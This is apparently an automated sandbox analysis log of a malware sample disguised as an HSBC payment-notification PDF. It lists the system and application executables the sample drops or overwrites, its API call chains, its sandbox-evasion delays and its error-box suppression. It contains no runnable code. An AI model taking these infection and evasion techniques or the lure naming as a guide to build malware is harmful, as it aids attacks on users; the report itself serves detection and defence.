Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Creates files inside the volume driver (system volume information)

Source: C:\Windows\System32\TieringEngineService.exe

File created: C:\System Volume Information\Heat\

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		1_2_004048D7
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		1_2_00485376

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00423187

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

API/Special instruction interceptor: Address: C421DC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599645	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599513	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599402	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599229	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599096	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598434	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597280	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597061	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595492	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595032	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594912	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594785	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594387	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594173	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593923	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593527	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593203	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3081	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6725	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Window / User API: threadDelayed 6608
Source: C:\Windows\SysWOW64\perfhost.exe	Window / User API: threadDelayed 3390

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
